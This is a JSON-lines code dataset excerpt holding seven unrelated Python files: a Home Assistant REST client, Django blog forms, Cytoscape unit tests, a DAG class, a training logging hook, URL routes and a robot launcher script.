+{"seq_id":"6181324667","text":"\"\"\"\nHome Assistant Client\nHandle connection between skill and HA instance trough websocket.\n\"\"\"\nimport ipaddress\nimport json\nimport re\n\nfrom fuzzywuzzy import fuzz\nfrom requests import get, post\nfrom requests.exceptions import RequestException, Timeout\nfrom requests.models import Response\n\n__author__ = \"btotharye\"\n\n# Timeout time for HA requests\nTIMEOUT = 10\n\n\"\"\"Regex for IP address check\"\"\"\nIP_REGEX = r\"\".join(\n r\"\\b(?:https?://)?((?:(?:www\\.)?(?:[\\da-z\\.-]+)\\.(?:[a-z]{2,6})|\"\n r\"(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[\"\n r\"0-4][0-9]|[01]?[0-9][0-9]?)|(?:(?:[0-9a-fA-F]{1,4}:){7,7}[0-9a\"\n r\"-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,7}:|(?:[0-9a-fA-F]{1,4}:){\"\n r\"1,6}:[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F\"\n r\"]{1,4}){1,2}|(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1\"\n r\",3}|(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}|(?:[0\"\n r\"-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,\"\n r\"4}:(?:(?::[0-9a-fA-F]{1,4}){1,6})|:(?:(?::[0-9a-fA-F]{1,4}){1,\"\n r\"7}|:)|fe80:(?::[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(?:fff\"\n r\"f(?::0{1,4}){0,1}:){0,1}(?:(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0\"\n r\",1}[0-9])\\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0,1}[0-9])|\"\n r\"(?:[0-9a-fA-F]{1,4}:){1,4}:(?:(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]\"\n r\"){0,1}[0-9])\\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0,1}[0-9\"\n r\"]))))(?::[0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{\"\n r\"2}|655[0-2][0-9]|6553[0-5])?(?:/[\\w\\.-]*)*/?\\b\"\n)\n\nIPV6_REGEX = r\"\".join(\n r\"((?:[0-9a-fA-F]{1,4}:){1,4}:(?:(?:25[0-5]|(?:2[0-4]|1{0,1}[0\"\n r\"-9]){0,1}[0-9])\\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0,1\"\n r\"}[0-9])|(?:fe80:(?::[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,})|\"\n r\"::(?:ffff(?::0{1,4}){0,1}:){0,1}(?:(?:25[0-5]|(2[0-4]|1{0,1}\"\n r\"[0-9]){0,1}[0-9])\\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0\"\n r\",1}[0-9])|(?:(?:[0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4})|(?:\"\n r\"[0-9a-fA-F]{1,4}:){1,7}(?:(?::[0-9a-fA-F]{1,4}){1,7}|:)|(?::\"\n r\":(?:[0-9a-fA-F]{1,4}:){,6}(?:[0-9a-fA-F]{1,4})))\"\n)\n\n\ndef check_url(ip_address: str) -> str:\n \"\"\"Function to check if valid url/ip was supplied\n\n First regex check for IPv6.\n If nothing found, second regex try to find IPv4 and domains names.\n\n Args:\n ip_address: String with ip address set by user.\n\n Returns:\n Ip address found by regex.\n \"\"\"\n if not ip_address:\n return\n\n valid = False\n matches = re.findall(IPV6_REGEX, ip_address)\n if matches:\n largest = max(matches, key=len)[0]\n\n if \":\" in largest:\n try:\n checked_ip = ipaddress.ip_address(largest)\n if checked_ip:\n valid = True\n except ValueError:\n return None\n\n if largest and valid:\n return largest\n\n matches = re.search(IP_REGEX, ip_address)\n if matches:\n return matches.group(1)\n return None\n\n\n# pylint: disable=R0912, W0105, W0511\nclass HomeAssistantClient:\n \"\"\"Home Assistant client class\"\"\"\n\n def __init__(self, config):\n self.ssl = config[\"ssl\"] or False\n self.verify = config[\"verify\"] or True\n ip_address = config[\"ip_address\"]\n token = config[\"token\"]\n port_number = config[\"port_number\"]\n if self.ssl:\n self.url = f\"https://{ip_address}\"\n else:\n self.url = f\"http://{ip_address}\"\n if port_number:\n self.url = f\"{self.url}:{port_number}\"\n self.headers = {\n \"Authorization\": f\"Bearer {token}\",\n \"Content-Type\": \"application/json\",\n }\n\n def _get_state(self) -> json:\n 
\"\"\"Get state object\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n Json containing response from HA.\n \"\"\"\n if self.ssl:\n req = get(\n f\"{self.url}/api/states\",\n headers=self.headers,\n verify=self.verify,\n timeout=TIMEOUT,\n )\n else:\n req = get(f\"{self.url}/api/states\", headers=self.headers, timeout=TIMEOUT)\n req.raise_for_status()\n return req.json()\n\n def connected(self) -> bool:\n \"\"\"Simple connection test to HA instance\n\n Returns:\n Return false if any of errors occur\n \"\"\"\n try:\n self._get_state()\n return True\n except (Timeout, ConnectionError, RequestException):\n return False\n\n def find_entity(self, entity: str, types: list) -> dict:\n \"\"\"Find entity with specified name, fuzzy matching\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n Dict represeting entity\n \"\"\"\n json_data = self._get_state()\n # require a score above 50%\n best_score = 50\n best_entity = None\n if json_data:\n for state in json_data:\n try:\n if state[\"entity_id\"].split(\".\")[0] in types:\n # something like temperature outside\n # should score on \"outside temperature sensor\"\n # and repetitions should not count on my behalf\n score = fuzz.token_sort_ratio(\n entity, state[\"attributes\"][\"friendly_name\"].lower()\n )\n if score > best_score:\n best_score = score\n best_entity = {\n \"id\": state[\"entity_id\"],\n \"dev_name\": state[\"attributes\"][\"friendly_name\"],\n \"state\": state[\"state\"],\n \"best_score\": best_score,\n \"attributes\": state[\"attributes\"],\n }\n score = fuzz.token_sort_ratio(\n entity, state[\"entity_id\"].lower()\n )\n if score > best_score:\n best_score = score\n best_entity = {\n \"id\": state[\"entity_id\"],\n \"dev_name\": state[\"attributes\"][\"friendly_name\"],\n \"state\": state[\"state\"],\n \"best_score\": best_score,\n \"attributes\": state[\"attributes\"],\n }\n except KeyError:\n pass\n return best_entity\n\n def find_entity_attr(self, entity: str) -> dict:\n \"\"\"Get the entity attributes to be used in the response dialog.\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n Dict with entity's attributes\n \"\"\"\n json_data = self._get_state()\n\n if json_data:\n for attr in json_data:\n if attr[\"entity_id\"] == entity:\n entity_attrs = attr[\"attributes\"]\n try:\n if attr[\"entity_id\"].startswith(\"light.\"):\n # Not all lamps do have a color\n unit_measur = entity_attrs[\"brightness\"]\n else:\n unit_measur = entity_attrs[\"unit_of_measurement\"]\n except KeyError:\n unit_measur = \"\"\n # IDEA: return the color if available\n # TODO: change to return the whole attr dictionary =>\n # free use within handle methods\n sensor_name = entity_attrs[\"friendly_name\"]\n sensor_state = attr[\"state\"]\n entity_attr = {\n \"unit_measure\": unit_measur,\n \"name\": sensor_name,\n \"state\": sensor_state,\n }\n return entity_attr\n return None\n\n def list_entities(self, types: list) -> list:\n \"\"\"List all entities matching domains used within our skill\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n List with entity and it's friendly name\n \"\"\"\n\n json_data = self._get_state()\n entities = []\n if json_data:\n for state in json_data:\n try:\n entity_id = 
state[\"entity_id\"].split(\".\")\n domain = entity_id[0]\n entity = entity_id[1]\n if domain in types:\n \"\"\"Domain of Entity is in handled types.\n Add Entity and its friendly name to list.\n \"\"\"\n entities.append(entity)\n entities.append(state[\"attributes\"][\"friendly_name\"].lower())\n except KeyError:\n pass\n return entities\n\n def execute_service(self, domain: str, service: str, data: dict) -> Response:\n \"\"\"Execute service at HAServer\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n HA response\n \"\"\"\n if self.ssl:\n req = post(\n f\"{self.url}/api/services/{domain}/{service}\",\n headers=self.headers,\n data=json.dumps(data),\n verify=self.verify,\n timeout=TIMEOUT,\n )\n else:\n req = post(\n f\"{self.url}/api/services/{domain}/{service}\",\n headers=self.headers,\n data=json.dumps(data),\n timeout=TIMEOUT,\n )\n req.raise_for_status()\n return req\n\n def find_component(self, component: str) -> bool:\n \"\"\"Check if a component is loaded at the HA-Server\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n True/False if component found in response\n \"\"\"\n if self.ssl:\n req = get(\n f\"{self.url}/api/components\",\n headers=self.headers,\n verify=self.verify,\n timeout=TIMEOUT,\n )\n else:\n req = get(\n f\"{self.url}/api/components\", headers=self.headers, timeout=TIMEOUT\n )\n\n req.raise_for_status()\n return component in req.json()\n\n def engage_conversation(self, utterance: str) -> dict:\n \"\"\"Engage the conversation component at the Home Assistant server\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n Attributes:\n utterance raw text message to be processed\n\n Returns:\n Dict answer by Home Assistant server\n { 'speech': textual answer,\n 'extra_data': ...}\n \"\"\"\n data = {\"text\": utterance}\n if self.ssl:\n req = post(\n f\"{self.url}/api/conversation/process\",\n headers=self.headers,\n data=json.dumps(data),\n verify=self.verify,\n timeout=TIMEOUT,\n )\n else:\n req = post(\n f\"{self.url}/api/conversation/process\",\n headers=self.headers,\n data=json.dumps(data),\n timeout=TIMEOUT,\n )\n req.raise_for_status()\n return req.json()[\"speech\"][\"plain\"]\n","repo_name":"MycroftAI/mycroft-dinkum","sub_path":"skills/homeassistant.mark2/ha_client.py","file_name":"ha_client.py","file_ext":"py","file_size_in_byte":12076,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
+{"seq_id":"19791716081","text":"from django import forms\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, ButtonHolder, Submit, Button, Div, Fieldset, Field, Hidden, HTML\nfrom sorl.thumbnail.fields import ImageFormField\nfrom taggit.forms import TagField\nfrom ckeditor.widgets import CKEditorWidget\n\nfrom .models import Article\n\n\nclass BlogEntryForm(forms.Form):\n\n title = forms.CharField(max_length=150)\n image = ImageFormField()\n tags = TagField()\n content = forms.CharField(widget=CKEditorWidget())\n score = forms.DecimalField(max_value=settings.RATING_SCALE, max_digits=settings.RATING_MAX_DIGITS, min_value=0)\n\n def __init__(self, *args, **kwargs):\n super(BlogEntryForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'pure-form pure-form-stacked pure-u-1'\n self.helper.layout = Layout(\n Div(\n Button('reset', 'Reset Section', data_section_id=1, data_btn_nm='reset', wrapper_class='rep', css_class='sec_btn pure-button'),\n Button('del', 'Delete Section', data_section_id=1, data_btn_nm='del', wrapper_class='rep', css_class='sec_btn pure-button'),\n Field('title', wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('score', wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('image', wrapper_class='norep pure-control-group', css_class='rep'), # Class norep tells the item must be removed from replica's\n Field('content', wrapper_class='rep pure-control-group', css_class='rep'),\n css_class='section',\n css_id='sec',\n data_section_id=1\n ),\n Field('tags', wrapper_class='norep pure-control-group', css_class='norep'),\n ButtonHolder(\n Button('add', 'Add Section', data_btn_nm='add', data_section_count=1, css_id='add', css_class='sec_btn pure-button'),\n Button('save', 'Save Section', css_id='save', css_class='pure-button'),\n Submit('submit', 'Submit Post', css_id='submit', css_class='pure-button pure-button-primary'),\n css_id='buttons'\n ),\n )\n\n class Media:\n js = (\n )\n\n\nclass BlogEntryUpdateForm(forms.Form):\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Add sections dynamically\n :param cls:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n new_class = super(BlogEntryUpdateForm, cls).__new__(cls, *args, **kwargs)\n article = kwargs.get('initial')\n base_fields = {}\n for section in article.articlesection_set.all():\n delim = '' if section.section_order == 1 else '_' + str(section.section_order)\n base_fields['content' + delim] = forms.CharField(widget=CKEditorWidget(), initial=section.content)\n base_fields['score' + delim] = forms.DecimalField(max_value=settings.RATING_SCALE, max_digits=settings.RATING_MAX_DIGITS, min_value=0, initial=section.score)\n base_fields['id' + delim] = forms.IntegerField(initial=section.id)\n\n if section.section_order == 1:\n base_fields['title' + delim] = forms.CharField(max_length=150, initial=section.title)\n base_fields['title'].widget.attrs['readonly'] = 'readonly'\n base_fields['image'] = ImageFormField(initial=article.image)\n base_fields['article'] = forms.IntegerField(initial=article.id)\n base_fields['tags' + delim] = TagField(initial=', '.join(article.tags.names()))\n else:\n base_fields['title' + delim] = forms.CharField(max_length=150, initial=section.title)\n new_class.base_fields = base_fields\n\n return new_class\n\n def __init__(self, *args, **kwargs):\n 
super(BlogEntryUpdateForm, self).__init__(*args, **kwargs)\n # Field mappings for dynamic generation\n self.helper = FormHelper()\n self.helper.form_class = 'pure-form pure-form-stacked pure-u-1'\n # TODO: This can be moved to above super call to avoid self.initial initialize\n article = kwargs.pop('initial')\n # Explicitly initializing form to handle edits\n #if not self.is_bound:\n self.initial = {}\n\n layouts = []\n article_id = article.id\n\n for section in article.articlesection_set.all():\n if section.section_order == 1:\n layouts.append(\n Div(\n Field('title', wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('score', wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Div(\n HTML(\"\"\"{% load thumbnail %}{% load misc %}
Currently: {{ form.image|filename }}{% if form.image.value %}{% thumbnail form.image.value \"300x200\" as im %}{% endif %}>
\"\"\"),\n css_class='pure-u-1'\n ),\n #Field('image', wrapper_class='norep pure-control-group', css_class='rep'), # Class norep tells the item must be removed from replica's\n Field('content', wrapper_class='rep pure-control-group', css_class='rep'),\n Hidden('id', section.id),\n css_class='section',\n css_id='sec',\n data_section_id=1,\n data_article_id=article_id\n )\n )\n else:\n delim = '_' + str(section.section_order)\n secnum = section.section_order\n layouts.append(\n Div(\n Field('title' + delim, wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('score' + delim, wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('content' + delim, wrapper_class='rep pure-control-group', css_class='rep'),\n Hidden('id' + delim, section.id),\n css_class='section',\n css_id='sec' + delim,\n data_section_id=secnum\n )\n )\n\n layouts.append(Field('tags', wrapper_class='norep pure-control-group', css_class='norep'))\n layouts.append(ButtonHolder(\n Hidden('article', article_id),\n Submit('submit', 'Update Post', css_id='submit', css_class='pure-button pure-button-primary'),\n css_id='buttons'\n ))\n\n self.helper.layout = Layout(\n *layouts\n )\n\n class Media:\n js = (\n )\n\n\ndef validate_vote_type(value):\n if value not in (0, 1, 9):\n raise ValidationError('Invalid Vote Type', code='invalid')\n\n\nclass BlogVoteForm(forms.Form):\n article = forms.IntegerField()\n section = forms.IntegerField()\n vote_type = forms.IntegerField(validators=[validate_vote_type,]) # 0 is Negative and 1 is positive vote, 9 is Abusive\n","repo_name":"kumarvaradarajulu/django-andblog","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"16519527292","text":"import unittest\nimport re\nimport json\nfrom requests import RequestException\n\nfrom test_utils import *\n\n\nclass StyleValuesTests(unittest.TestCase):\n def setUp(self):\n try:\n close_session(False)\n# delete_all_networks()\n except:\n pass\n\n def tearDown(self):\n pass\n\n _TEST_STYLE = 'galFiltered Style'\n\n @print_entry_exit\n def test_get_node_property(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_property, 'node_names', 'node', 'NODE_LABEL', 'COMMON', 'YER112W', 'LSM4')\n\n @print_entry_exit\n def test_get_edge_property(self):\n # Initialization\n load_test_session()\n update_style_mapping(style_name=self._TEST_STYLE, mapping=map_visual_property(visual_prop='EDGE_LABEL', table_column='interaction', mapping_type='p'))\n\n self._check_get_property(get_edge_property, 'edge_names', 'edge', 'EDGE_LABEL', 'interaction', 'YDR277C (pp) YJR022W', 'pp')\n\n @print_entry_exit\n def test_get_network_property(self):\n # Initialization\n load_test_session()\n\n scale_prop = get_network_property('NETWORK_SCALE_FACTOR')\n self.assertIsInstance(scale_prop, float)\n\n self.assertRaises(CyError, get_network_property, None)\n self.assertRaises(CyError, get_network_property, 'BogusProperty')\n self.assertRaises(CyError, get_network_property, 'NETWORK_SCALE_FACTOR', network='BogusNetwork')\n\n @print_entry_exit\n def test_get_node_color(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_color, 'node_names', 'node', None, None, 'YER112W', '#FFFFE7')\n\n @print_entry_exit\n def test_get_node_size(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_size, 'node_names', 'node', None, None, 'YER112W', 46.470588235294116)\n\n @print_entry_exit\n def test_get_node_width(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_width, 'node_names', 'node', None, None, 'YER112W', 46.470588235294116)\n\n @print_entry_exit\n def test_get_node_height(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_height, 'node_names', 'node', None, None, 'YER112W', 46.470588235294116)\n\n @print_entry_exit\n def test_get_node_position(self):\n # Initialization\n load_test_session()\n all_node_names = get_table_columns(columns=['name'])\n\n def check_position_table(position_df, node_id_set):\n # Verify that all nodes are present\n self.assertSetEqual(set(position_df.index), node_id_set)\n # Verify that the table has exactly the 'x' and 'y' columns\n self.assertSetEqual(set(position_df), {'x', 'y'})\n\n # Verify that getting positions for all nodes works\n check_position_table(get_node_position(), set(all_node_names['name']))\n\n # Verify that getting positions for all nodes works when nodes are named\n check_position_table(get_node_position(list(all_node_names['name'])), set(all_node_names['name']))\n\n # Verify that getting positions for all nodes works when identified by SUIDs\n check_position_table(get_node_position(list(all_node_names.index)), set(all_node_names.index))\n\n # Verify that getting positions for all nodes works when identified by SUIDs\n check_position_table(get_node_position('YER112W'), {'YER112W'})\n\n # Verify that bad property, node/edge name or network is caught\n self.assertRaises(CyError, get_node_position, ['bogusName'])\n self.assertRaises(CyError, get_node_position, network='BogusNetwork')\n\n @print_entry_exit\n def test_get_edge_line_width(self):\n # Initialization\n load_test_session()\n\n 
self._check_get_property(get_edge_line_width, 'edge_names', 'edge', None, None, 'YOR355W (pp) YNL091W', 2.0)\n\n @print_entry_exit\n def test_get_edge_color(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_edge_color, 'edge_names', 'edge', None, None, 'YOR355W (pp) YNL091W', '#808080')\n\n @print_entry_exit\n def test_get_edge_line_style(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_edge_line_style, 'edge_names', 'edge', None, None, 'YOR355W (pp) YNL091W', 'SOLID')\n\n @print_entry_exit\n def test_get_edge_target_arrow(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_edge_target_arrow_shape, 'edge_names', 'edge', None, None, 'YOR355W (pp) YNL091W', 'NONE')\n\n @print_entry_exit\n def test_get_network_center(self):\n # Initialization\n load_test_session()\n\n # Verify that the proper dict is returned\n res = get_network_center()\n self.assertIsInstance(res, dict)\n self.assertEqual(len(res), 2)\n self.assertIn('x', res)\n self.assertIsInstance(res['x'], float)\n self.assertIn('y', res)\n self.assertIsInstance(res['y'], float)\n\n # Verify that a bad network is caught\n self.assertRaises(CyError, get_network_center, network='BogusNetwork')\n\n @print_entry_exit\n def test_get_network_zoom(self):\n # Initialization\n load_test_session()\n\n # Verify that the proper type is returned\n res = get_network_zoom()\n self.assertIsInstance(res, float)\n\n # Verify that a bad network is caught\n self.assertRaises(CyError, get_network_zoom, network='BogusNetwork')\n\n def _check_get_property(self, getter_func, names_param, table, visual_property, data_column, single_name, single_value):\n # Create various flavors of parameter lists for getter_func, including lists and string lists of names and suids\n if data_column is None:\n all_names = get_table_columns(columns=['name'], table=table)\n else:\n all_names = get_table_columns(columns=['name', data_column], table=table)\n prop_param = {} if visual_property is None else {'visual_property': visual_property}\n all_names_param = {names_param: list(all_names['name'])}\n all_names_str_param = {names_param: ','.join(list(all_names['name']))}\n all_suids_param = {names_param: list(all_names.index)}\n all_suids_str_param = {names_param: str(list(all_names.index))[1:-1]}\n prop_names_params = all_names_param.copy()\n prop_names_params.update(prop_param)\n prop_names_str_params = all_names_str_param.copy()\n prop_names_str_params.update(prop_param)\n prop_suids_params = all_suids_param.copy()\n prop_suids_params.update(prop_param)\n prop_suids_str_params = all_suids_str_param.copy()\n prop_suids_str_params.update(prop_param)\n single_name_params = {names_param: single_name}\n single_name_params.update(prop_param)\n\n # Verify that visual properties can be returned for all nodes/edges\n name_value_dict = getter_func(**prop_param)\n self.assertIsInstance(name_value_dict, dict)\n self.assertEqual(len(name_value_dict), len(all_names.index))\n if data_column is not None:\n name_found = [name in name_value_dict and value == name_value_dict[name] for name, value in zip(all_names['name'], all_names[data_column])]\n self.assertFalse(False in name_found)\n\n # Verify that the same visual properties are returned when the nodes/edges are identified by name list\n by_name_dict = getter_func(**prop_names_params)\n self.assertDictEqual(by_name_dict, name_value_dict)\n\n # Verify that the same visual properties are returned when the nodes/edges are identified by string name list\n 
by_name_dict = getter_func(**prop_names_str_params)\n self.assertDictEqual(by_name_dict, name_value_dict)\n\n # Verify that the same visual properties are returned when nodes/edges are identified by SUID\n # This means looking the SUID up in the all_names table, getting the name, and then using prior test's result\n by_suid_dict = getter_func(**prop_suids_params)\n suid_found = [by_suid_dict[suid] == name_value_dict[all_names['name'][suid]] for suid in by_suid_dict]\n self.assertFalse(False in suid_found)\n\n # Verify that the same visual properties are returned when nodes/edges are identified by string SUID list\n # This means looking the SUID up in the all_names table, getting the name, and then using prior test's result\n by_suid_dict = getter_func(**prop_suids_str_params)\n suid_found = [by_suid_dict[suid] == name_value_dict[all_names['name'][suid]] for suid in by_suid_dict]\n self.assertFalse(False in suid_found)\n\n # Verify that the right node and visual property are returned when nodes/edges name is a string\n by_str_dict = getter_func(**single_name_params)\n self.assertDictEqual(by_str_dict, {single_name: single_value})\n\n # Verify that bad property, node/edge name or network is caught\n if visual_property is not None:\n self.assertRaises(CyError, getter_func, **{names_param: single_name})\n self.assertRaises(CyError, getter_func, visual_property=visual_property, **{names_param: 'bogusName'})\n self.assertRaises(CyError, getter_func, visual_property='BogusProperty', **{names_param: single_name})\n self.assertRaises(CyError, getter_func, **{names_param: single_name}, network='BogusNetwork')\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cytoscape/py4cytoscape","sub_path":"tests/test_style_values.py","file_name":"test_style_values.py","file_ext":"py","file_size_in_byte":9624,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"3"}
+{"seq_id":"34210952675","text":"from congregation.dag.nodes import OpNode\n\n\nclass Dag:\n def __init__(self, roots: set):\n self.roots = roots\n\n def __str__(self):\n return \"\\n\".join(str(node) for node in self.top_sort())\n\n def involves_compute_party(self, pid: int):\n \"\"\"\n For a given PID, check if it owns any\n data associated with this DAG\n \"\"\"\n\n for r in self.roots:\n for sw_set in r.out_rel.stored_with:\n if pid in sw_set:\n return True\n return False\n\n def dfs_visit(self, visitor):\n\n visited = set()\n for root in self.roots:\n self._dfs_visit(root, visitor, visited)\n\n return visited\n\n def _dfs_visit(self, node: OpNode, visitor, visited: set):\n\n visitor(node)\n visited.add(node)\n for child in node.children:\n if child not in visited:\n self._dfs_visit(child, visitor, visited)\n\n def dfs_print(self):\n self.dfs_visit(print)\n\n def get_all_nodes(self):\n return self.dfs_visit(lambda node: node)\n\n def top_sort(self):\n\n unmarked = sorted(list(self.get_all_nodes()), key=lambda x: x.out_rel.name)\n marked = set()\n temp_marked = set()\n ordered = []\n\n while unmarked:\n node = unmarked.pop()\n self._top_sort_visit(node, marked, temp_marked, unmarked, ordered)\n\n return ordered\n\n def _top_sort_visit(self, node: OpNode, marked: set, temp_marked: set, unmarked: [list, set], ordered: list):\n\n if node in temp_marked:\n raise Exception(f\"Cycle detected in graph, not a dag: Node {node} was in {temp_marked}.\")\n\n if node not in marked:\n if node in unmarked:\n unmarked.remove(node)\n temp_marked.add(node)\n children = sorted(list(node.children), key=lambda x: x.out_rel.name)\n\n for other_node in children:\n self._top_sort_visit(other_node, marked, temp_marked, unmarked, ordered)\n\n marked.add(node)\n unmarked.append(node)\n temp_marked.remove(node)\n ordered.insert(0, node)\n","repo_name":"multiparty/congregation","sub_path":"congregation/dag/dag.py","file_name":"dag.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"}
+{"seq_id":"20079589124","text":"import logging\nfrom typing import Optional\n\nfrom classy_vision.generic.distributed_util import get_rank\nfrom classy_vision.hooks import register_hook\nfrom classy_vision.hooks.classy_hook import ClassyHook\n\n\n@register_hook(\"loss_lr_meter_logging\")\nclass LossLrMeterLoggingHook(ClassyHook):\n \"\"\"\n Logs the loss, optimizer LR, and meters. Logs at the end of a phase.\n \"\"\"\n\n on_phase_start = ClassyHook._noop\n on_end = ClassyHook._noop\n\n def __init__(self, log_freq: Optional[int] = None) -> None:\n \"\"\"The constructor method of LossLrMeterLoggingHook.\n\n Args:\n log_freq: if specified, also logs every ``log_freq`` batches.\n\n \"\"\"\n super().__init__()\n assert log_freq is None or isinstance(\n log_freq, int\n ), \"log_freq must be an int or None\"\n self.log_freq: Optional[int] = log_freq\n\n def on_start(self, task) -> None:\n logging.info(f\"Starting training. Task: {task}\")\n\n def on_phase_end(self, task) -> None:\n \"\"\"\n Log the loss, optimizer LR, and meters for the phase.\n \"\"\"\n batches = len(task.losses)\n if batches:\n # Most trainers will sync meters on phase end, however we\n # do not explicitly state this since it is possible for a\n # trainer to implement an unsynced end of phase meter or\n # for meters to not provide a sync function.\n self._log_loss_lr_meters(task, prefix=\"Synced meters: \", log_batches=True)\n\n def on_step(self, task) -> None:\n \"\"\"\n Log the LR every log_freq batches, if log_freq is not None.\n \"\"\"\n if self.log_freq is None or not task.train:\n return\n batches = len(task.losses)\n if batches and batches % self.log_freq == 0:\n self._log_loss_lr_meters(task, prefix=\"Approximate meters: \")\n\n def _log_loss_lr_meters(self, task, prefix=\"\", log_batches=False) -> None:\n \"\"\"\n Compute and log the loss, lr, and meters.\n \"\"\"\n\n phase_type = task.phase_type\n phase_type_idx = task.train_phase_idx if task.train else task.eval_phase_idx\n batches = len(task.losses)\n\n # Loss for the phase\n loss = sum(task.losses) / batches\n phase_pct = batches / task.num_batches_per_phase\n msg = (\n f\"{prefix}[{get_rank()}] {phase_type} phase {phase_type_idx} \"\n f\"({phase_pct*100:.2f}% done), loss: {loss:.4f}, meters: {task.meters}\"\n )\n if task.train:\n msg += f\", lr: {task.optimizer.options_view.lr:.4f}\"\n if phase_type == \"test\" and hasattr(task, \"ema\"):\n msg += f\", ema: {task.ema}\"\n if log_batches:\n msg += f\", processed batches: {batches}\"\n\n logging.info(msg)\n","repo_name":"facebookresearch/ClassyVision","sub_path":"classy_vision/hooks/loss_lr_meter_logging_hook.py","file_name":"loss_lr_meter_logging_hook.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":1563,"dataset":"github-code","pt":"3"}
+{"seq_id":"35145125115","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'polling'\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('/', views.questionview, name='questions'),\n path('/results/', views.results, name='results'), \n]","repo_name":"CaptainDespair/web-statistics","sub_path":"webstatistics/appstat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73625571281","text":"import src.robot as r\nimport sys\nimport os\nimport json\n\ndef main():\n \n # leer fichero de configuracion saimazoom_config.json\n with open('saimazoom_config.json') as json_file:\n data = json.load(json_file)\n p_almacen = data['p_almacen'] or 0.95\n robot = r.Robot(p_almacen)\n robot.channel.start_consuming()\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)","repo_name":"Willygap1572/Saimazoom","sub_path":"launch_robot.py","file_name":"launch_robot.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
